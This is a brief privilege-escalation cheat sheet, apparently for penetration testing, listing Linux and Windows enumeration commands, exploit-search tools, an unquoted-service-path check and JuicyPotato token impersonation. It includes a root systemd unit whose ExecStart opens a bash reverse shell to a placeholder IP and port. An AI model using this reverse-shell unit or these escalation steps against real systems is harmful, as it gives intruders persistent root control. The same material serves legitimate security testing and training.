Privilege Escalation
Enum
Linux
Windows
linPEAS.sh
# Basic linPEAS.sh usage
# tee: copies stdin to stdout and also writes it to the given file
$ ./linpeas.sh | tee log.txt
winPEAS.exe
# winPEAS.exe
$ .\winPEAS.exe
Linux Find SUID files
# Use 'find' to list files with the setuid bit set; stderr is discarded to hide permission-denied errors
$ find / -perm -4000 -type f 2>/dev/null
Windows Privilege Information
# show the current user's privileges
$ whoami /priv
Exploit Search
# SearchSploit
# update exploitdb packages
$ searchsploit -u
# show searchsploit usage and options
$ searchsploit -h
# wes.py
# update database
$ ./windows-exploit-suggester.py --update
# suggest possible exploits
$ ./windows-exploit-suggester.py --database [yyyy-mm-dd-mssb.xlsx] --systeminfo [systeminfo.txt]
Linux systemctl
# Template service file
# * use absolute paths for binaries in ExecStart
# systemctl enable xxxxx.service (pass the unit file's absolute path)
# systemctl start xxxxx
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/[ip]/[port] 0>&1'
[Install]
WantedBy=multi-user.target
Windows Unquoted Path Service Vulnerability
# enumeration
$ powershell -c "Get-Service"
$ sc qc [serviceName]
# list non-Microsoft services
# with automatic start mode and an unquoted path
$ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
# exploit
$ sc stop [serviceName]
$ sc start [serviceName]
Windows Token Impersonation
# JuicyPotato
# https://github.com/ohpe/juicy-potato
$ JuicyPotato.exe -l [port] -p C:\[program path] -t * -c [CLSID]
# or point -p at a .bat file to run a command
$ JuicyPotato.exe -l [port] -p C:\[.bat path] -t * -c [CLSID]